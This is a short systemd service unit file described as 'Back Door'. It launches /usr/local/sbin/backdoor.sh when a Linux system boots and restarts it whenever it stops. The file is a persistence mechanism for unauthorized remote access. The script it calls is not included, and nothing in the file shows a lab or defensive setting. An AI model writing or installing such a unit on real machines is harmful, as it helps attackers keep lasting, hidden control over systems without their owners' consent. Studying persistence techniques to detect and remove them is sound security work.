[Unit]
Description=Back Door
After=network.target

[Service]
ExecStart=/usr/local/sbin/backdoor.sh start
ExecStop=/usr/local/sbin/backdoor.sh stop
Restart=always

[Install]
WantedBy=multi-user.target
